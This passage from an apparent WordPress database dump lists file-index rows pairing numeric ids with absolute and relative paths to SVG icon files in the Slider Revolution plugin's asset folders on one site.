/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_watch_later_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_watch_later_24px.svg'),(2346,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_work_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_work_24px.svg'),(2347,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_youtube_searched_for_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_youtube_searched_for_24px.svg'),(2348,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_zoom_in_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_zoom_in_24px.svg'),(2349,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_zoom_out_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_zoom_out_24px.svg'),(2350,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_add_alert_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_add_alert_24px.svg'),(2351,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_error_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_error_24px.svg'),(2352,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_error_outline_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_error_outline_24px.svg'),(2353,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_warning_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_warning_24px.svg'),(2354,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_add_to_queue_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_add_to_queue_24px.svg'),(2355,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_airplay_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_airplay_24px.svg'),(2356,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_album_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_album_24px.svg'),(2357,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_art_track_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_art_track_24px.svg'),(2358,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_av_timer_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_av_timer_24px.svg'),(2359,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_closed_caption_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_closed_caption_24px.svg'),(2360,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_equalizer_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_equalizer_24px.svg'),(2361,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_explicit_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_explicit_24px.svg'),(2362,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fast_forward_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fast_forward_24px.svg'),(2363,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fast_rewind_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fast_rewind_24px.svg'),(2364,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_dvr_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_dvr_24px.svg'),(2365,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_manual_record_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_manual_record_24px.svg'),(2366,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_new_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_new_24px.svg'),(2367,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_pin_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_pin_24px.svg'),(2368,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_smart_record_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_smart_record_24px.svg'),(2369,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_forward_10_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_forward_10_24px.svg'),(2370,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_forward_30_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_forward_30_24px.svg'),(2371,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_forward_5_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_forward_5_24px.svg'),(2372,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_games_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_games_24px.svg'),(2373,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_hd_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_hd_24px.svg'),(2374,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_hearing_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_hearing_24px.svg'),(2375,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_high_quality_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_high_quality_24px.svg'),(2376,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_library_add_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_library_add_24px.svg'),(2377,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_library_books_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_library_books_24px.svg'),(2378,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_library_music_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_library_music_24px.svg'),(2379,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_loop_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_loop_24px.svg'),(2380,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_mic_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_mic_24px.svg'),(2381,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_mic_none_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_mic_none_24px.svg'),(2382,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_mic_off_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_mic_off_24px.svg'),(2383,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_movie_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_movie_24px.svg'),(2384,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_music_video_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_music_video_24px.svg'),(2385,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_new_releases_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_new_releases_24px.svg'),(2386,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_not_interested_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_not_interested_24px.svg'),(2387,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_pause_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_pause_24px.svg'),(2388,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_pause_circle_filled_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_pause_circle_filled_24px.svg'),(2389,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_pause_circle_outline_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_pause_circle_outline_24px.svg'),(2390,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_play_arrow_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_play_arrow_24px.svg'),(2391,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_play_circle_filled_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_play_circle_filled_24px.svg'),(2392,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_play_circle_outline_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_play_circle_outline_24px.svg'),(2393,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_playlist_add_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_playlist_add_24px.svg'),(2394,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_playlist_add_check_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_playlist_add_check_24px.svg'),(2395,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_playlist_play_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_playlist_play_24px.svg'),(2396,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_queue_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_queue_24px.svg'),(2397,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_queue_music_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_queue_music_24px.svg'),(2398,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_queue_play_next_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_queue_play_next_24px.svg'),(2399,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_radio_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_radio_24px.svg'),(2400,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_recent_actors_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_recent_actors_24px.svg'),(2401,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_remove_from_queue_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_remove_from_queue_24px.svg'),(2402,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_repeat_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_repeat_24px.svg'),(2403,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_repeat_one_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_repeat_one_24px.svg'),(2404,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_replay_10_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_replay_10_24px.svg'),(2405,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_replay_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_replay_24px.svg'),(2406,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_replay_30_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_replay_30_24px.svg'),(2407,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_replay_5_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_replay_5_24px.svg'),(2408,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_shuffle_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_shuffle_24px.svg'),(2409,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_skip_next_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_skip_next_24px.svg'),(2410,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_skip_previous_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_skip_previous_24px.svg'),(2411,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_slow_motion_video_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_slow_motion_video_24px.svg'),(2412,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_snooze_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_snooze_24px.svg'),(2413,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_sort_by_alpha_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_sort_by_alpha_24px.svg'),(2414,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_stop_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_stop_24px.svg'),(2415,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_subscriptions_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_subscriptions_24px.svg'),(2416,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_subtitles_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_subtitles_24px.svg'),(2417,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_surround_sound_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_surround_sound_24px.svg'),(2418,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_video_library_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_video_library_24px.svg'),(2419,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_videocam_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_videocam_24px.svg'),(2420,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_videocam_off_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_videocam_off_24px.svg'),(2421,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_volume_down_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_volume_down_24px.svg'),(2422,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_volume_mute_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_volume_mute_24px.svg'),(2423,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_volume_off_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_volume_off_24px.svg'),(2424,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_volume_up_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_volume_up_24px.svg'),(2425,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_web_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_web_24px.svg'),(2426,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_web_asset_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_web_asset_24px.svg'),(2427,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/NewTux.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/NewTux.svg'),(2428,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/abacus.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/abacus.svg'),(2429,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/address-book.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/address-book.svg'),(2430,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/address-book2.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/address-book2.svg'),(2431,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/aim.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/aim.svg'),(2432,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/alarm.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/alarm.svg'),(2433,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/apple.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/apple.svg'),(2434,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/arrow-left.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/arrow-left.svg'),(2435,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/arrow-right.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/arrow-right.svg'),(2436,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/arrows-updown.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/arrows-updown.svg'),(2437,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/atm-cash.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/atm-cash.svg'),(2438,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award1.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award1.svg'),(2439,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award2.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award2.svg'),(2440,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award3.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award3.svg'),(2441,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award4.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award4.svg'),(2442,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award5.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award5.svg'),(2443,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/badge01.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/badge01.svg'),(2444,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/badge02.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/badge02.svg'),(2445,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bank.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bank.svg'),(2446,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bank2.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bank2.svg'),(2447,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bell.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bell.svg'),(2448,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/binoculars.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/binoculars.svg'),(2449,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bomb.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bomb.svg'),(2450,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bonsai.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bonsai.svg'),(2451,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/book-apple.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/book-apple.svg'),(2452,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/book.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/book.svg'),(2453,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bookmark.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bookmark.svg'),(2454,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/box.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/box.svg'),(2455,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/brain.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/brain.svg'),(2456,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/briefcase.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/briefcase.svg'),(2457,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/browser01.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/browser01.svg'),(2458,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/browser02.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/browser02.svg'),(2459,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/buildings.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/buildings.svg'),(2460,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/buy-sign.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/buy-sign.svg'),(2461,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calculator1.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calculator1.svg'),(2462,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calculator2.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calculator2.svg'),(2463,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calculator3.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calculator3.svg'),(2464,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calendar1.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calendar1.svg'),(2465,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calendar2.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calendar2.svg'),(2466,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calendar3.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calendar3.svg'),(2467,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calendar4.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calendar4.svg'),(2468,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calendar5.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calendar5.svg'),(2469,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/certificate.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/certificate.svg'),(2470,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/champagne.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/champagne.svg'),(2471,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character01.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character01.svg'),(2472,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character02.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character02.svg'),(2473,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character03.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character03.svg'),(2474,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character04.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character04.svg'),(2475,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character05.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character05.svg'),(2476,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character06.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character06.svg'),(2477,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character07.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character07.svg'),(2478,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character08.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character08.svg'),(2479,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart-analysis.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart-analysis.svg'),(2480,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart-board.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart-board.svg'),(2481,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart-pyramid.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart-pyramid.svg'),(2482,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart01.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart01.svg'),(2483,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart02.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart02.svg'),(2484,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart03.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart03.svg'),(2485,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart04.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart04.svg'),(2486,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart05.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart05.svg'),(2487,'/home/tummmyov/tummyrevolution.com/wp-